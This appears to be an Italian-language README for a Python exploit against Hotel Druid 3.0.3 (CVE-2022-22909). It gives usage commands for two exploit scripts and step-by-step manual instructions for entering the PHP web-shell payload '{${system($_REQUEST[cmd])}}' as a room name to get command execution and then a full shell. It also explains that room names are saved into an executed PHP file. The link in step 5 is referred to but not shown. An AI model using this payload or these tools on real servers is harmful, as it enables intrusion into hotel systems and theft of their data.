
Exploit basato su Python per l'esecuzione remota di codice in Hotel Druid 3.0.3 (CVE-2022-22909). Inietta payload PHP tramite i nomi delle camere per ottenere l'esecuzione di comandi e l'accesso alla shell su target vulnerabili.
Questo Exploit crea una nuova stanza con il nostro payload PHP come nome della stanza.
Utilizzo :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

Questo Exploit funziona se conosci già il nome della stanza.
Utilizzo :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Vai alla pagina di Hotel Druid.
2). Clicca su Tables -> Rooms

3). Nel campo Create New Room aggiungi il seguente codice php e clicca su Add.
{${system($_REQUEST[cmd])}}

4). Vedrai una nuova stanza con il nostro payload nel campo del nome "Room".

5). Vai al link qui sotto e otterrai l'esecuzione dei comandi. In seguito potrai ottenere una shell completa.
Nota : Sostituisci l'IP con l'IP del tuo target hoteldruid.
Questa vulnerabilità si verifica perché i nomi delle stanze vengono salvati all'interno di /var/www/html/hoteldruid/dati/selectappartamenti.php

E selectappartamenti.php è un file PHP, quindi qualsiasi codice PHP presente all'interno di quel file verrà eseguito dal server.